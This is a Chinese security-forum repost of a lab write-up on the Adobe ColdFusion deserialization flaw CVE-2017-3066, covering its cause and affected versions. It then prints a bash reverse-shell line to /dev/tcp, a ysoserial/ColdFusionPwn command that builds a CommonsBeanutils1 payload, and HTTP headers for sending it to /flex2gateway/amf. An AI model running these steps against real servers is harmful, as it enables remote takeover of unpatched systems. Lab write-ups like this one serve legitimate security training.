安全矩阵

 找回密码
 立即注册
搜索
查看: 2626|回复: 0

Adobe ColdFusion 反序列化漏洞(CVE-2017-3066)

[复制链接]

22

主题

63

帖子

338

积分

中级会员

Rank: 3Rank: 3

积分
338
发表于 2020-8-9 17:58:02 | 显示全部楼层 |阅读模式
本文转自https://zhishihezi.net/box/c7ecf406d93ed094559f1cd654950609

漏洞原理
Adobe ColdFusion 是美国 Adobe 公司的一款动态Web服务器产品,其运行的 CFML(ColdFusion Markup Language)是针对Web应用的一种程序设计语言。
Adobe ColdFusion 中存在java反序列化漏洞。攻击者可利用该漏洞在受影响应用程序的上下文中执行任意代码或造成拒绝服务。以下版本受到影响:Adobe ColdFusion (2016 release) Update 3及之前的版本,ColdFusion 11 Update 11及之前的版本,ColdFusion 10 Update 22及之前的版本。
writeup
启动靶场
反弹shell的poc需要在 http://www.jackson-t.ca/runtime-exec-payloads.html 网站进行转码
反弹Shell格式
  1. bash -i >& /dev/tcp/ip/port 0>&1
复制代码
比如监听192.168.236.138的333端口
  1. bash -i >& /dev/tcp/192.168.236.138/333 0>&1
复制代码
攻击机执行
  1. java -cp ColdFusionPwn-0.0.1-SNAPSHOT-all.jar:ysoserial-0.0.6-SNAPSHOT-all.jar com.codewhitesec.coldfusionpwn.ColdFusionPwner -e CommonsBeanutils1 '编码后的反弹shell-poc' getshell.ser
复制代码
执行后会生成一个getshell.ser文件



再添加HTTP头部
  1. POST /flex2gateway/amf HTTP/1.1
  2. Host: your-ip:端口
  3. Accept-Encoding: gzip, deflate
  4. Accept: */*
  5. Accept-Language: en
  6. User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
  7. Connection: close
  8. Content-Type: application/x-amf
  9. Content-Length: 2853
复制代码
发送数据包

反弹shell,获取flag


本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?立即注册

x
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

小黑屋|安全矩阵

GMT+8, 2024-11-27 23:48 , Processed in 0.014241 second(s), 19 queries .

Powered by Discuz! X4.0

Copyright © 2001-2020, Tencent Cloud.

快速回复 返回顶部 返回列表